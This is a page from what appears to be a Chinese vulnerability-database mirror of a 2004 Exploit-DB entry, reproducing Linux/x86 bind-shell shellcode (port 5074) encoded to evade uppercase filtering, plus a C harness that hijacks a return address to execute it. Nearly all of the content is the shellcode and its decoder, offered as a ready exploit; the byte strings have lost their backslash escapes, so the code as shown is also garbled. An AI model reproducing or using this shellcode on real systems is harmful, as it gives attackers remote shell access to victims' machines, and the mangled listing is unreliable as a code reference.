Linux/x86 – Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)

Linux/x86 – Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)

漏洞ID 1054665 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Linux/x86 – Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Bind (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13427
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 * Bindshell puerto 5074 (TOUPPER EVASION)
 * 226 bytes
 * Bindshell original: Matias Sedalo (92 bytes)
 *
 * La binshell esta codificada usando 2 bytes para
 * representar 1 byte original de la siguiente forma:
 * byte original: 0xAB
 * 0x41 + 0xA = 0x4B; 0x41 + 0xB = 0x4C
 * byte codificado: [0x4B 0x4C]
 *
 * by Tora
 */

#include <stdio.h>
#include <ctype.h>

char shellcode[] = 
/* _start */
"xebx02"			/* jmp short A          */

/* A */
"xebx05"			/* jmp short C          */

/* B */
"xe8xf9xffxffxff"		/* call A               */

/* C */
"x5f"				/* pop edi              */
"x81xefxdfxffxffxff"	/* sub edi, 0xffffffdf  */
"x57"				/* push edi             */
"x5e"				/* pop esi              */
"x29xc9"			/* sub ecx, ecx         */
"x80xc1xb8"			/* add cl, 0xb8         */

/* bucle */
"x8ax07"			/* mov al, byte [edi]   */
"x2cx41"			/* sub al, 0x41         */
"xc0xe0x04"			/* shl al, 4            */
"x47"				/* inc edi              */
"x02x07"			/* add al, byte [edi]   */
"x2cx41"			/* sub al, 0x41         */
"x88x06"			/* mov byte [esi], al   */
"x46"				/* inc esi              */
"x47"				/* inc edi              */
"x49"				/* dec ecx              */
"xe2xed"			/* loop bucle           */
/* Shellcode codificada de 184 (0xb8) bytes */
"DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB"
"AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA"
"JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO"
"BLAALMNIA";

int main(void)
{
    int *ret;
    char *t;

    for (t = shellcode; *t; t++)
        if (islower(*t))
            *t = toupper(*t);
	
    ret=(int *)&ret +3;
    printf("Shellcode lenght=%dn",strlen(shellcode));
    (*ret) = (int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Centrinity FirstClass Desktop Client 7.1 – Local Buffer Overflow

Centrinity FirstClass Desktop Client 7.1 – Local Buffer Overflow 漏洞ID 1054439 漏洞类型 发布时间 2004-04-07 更新时间 2004-04-07 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享